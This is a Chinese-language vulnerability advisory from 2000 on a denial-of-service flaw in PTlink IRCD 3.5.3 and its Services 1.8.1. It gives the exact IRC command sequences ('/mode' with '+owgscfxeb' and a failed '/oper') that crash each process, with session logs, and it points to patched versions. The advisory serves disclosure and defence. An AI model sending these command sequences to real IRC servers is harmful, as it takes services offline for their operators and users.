发布日期：2000-11-29
更新日期：2000-11-29

受影响系统：

PTlink 3.5.3 IRCD
PTlink.Services 1.8.1

不受影响系统：

PTlink 5.7.1 IRCD
PTlink.Services 2.14.3

描述：

---

在PTlink IRCD v3.5.3和其services v1.8.1中存在漏洞，可利用该漏洞来杀掉服务进程。

一、使Services崩溃

连接到IRC服务器，然后执行如下操作：

先执行
/mode <your nick> +owgscfxeb
命令，再执行
/oper <oper nick> <something, doesnt really matter>
命令。

这将导致服务器执行如下操作：

/mode <your nick> +owgscfxeb

[23:25] *** whocares sets mode: +wgsx

/oper <oper nick> <something, doesnt really matter>

-
Password Incorrect
-
[23:25] -freddy.userfriendly- Your attempt has been logged.
-
[23:26] -freddy.userfriendly- *** Notice -- Connection to
services.freddy.userfriendly[*@192.168.0.3] activated.
-
[23:26] -freddy.userfriendly- *** Notice -- Lost connection to
services.freddy.userfriendly[192.168.0.3]:Broken pipe
-
此时察看进程，发现services进程已经退出：

[root@freddy wildcoyote]# ps aux | grep services
[root@freddy wildcoyote]#

二、使IRCD崩溃

连接到IRC服务器，然后执行如下操作：
先执行
/oper <oper nick> <something, doesnt really matter>
命令，再执行
/mode <your nick> +owgscfxeb
命令。

这将导致服务器执行如下操作：

[23:43] -NickServ- This nickname is registered and protected.  If it is your
-
[23:43] -NickServ- nick, type /NickServ IDENTIFY password.  Otherwise,
-
[23:43] -NickServ- please choose a different nick.
-
[23:43] -NickServ- If you do not change within one minute, your nick will be changed.

/oper wildcoyote whocares
-
Password Incorrect
-
[23:43] -freddy.userfriendly- Your attempt has been logged.

/mode mynick +owgscfxeb
-
[23:44] *** Disconnected

此时察看进程，发现IRCD已经退出：

[root@freddy wildcoyote]# ps aux | grep ircd
[root@freddy wildcoyote]#

<* 来源  wildcoyote(lms@ispgaya.pt) *>




建议：

---

厂商补丁：

PTlink在新的版本中已经解决了这个问题：    

PTlink IRC Services 2.14.3:
http://download.sourceforge.net/PTlinkSoft/PTlink.Services2.14.3.tar.gz

PTlink PTlink IRCd 5.7.1:
http://download.sourceforge.net/ptlinksoft/PTlink5.7.1.tar.gz




浏览次数：5374
严重程度：0（网友投票）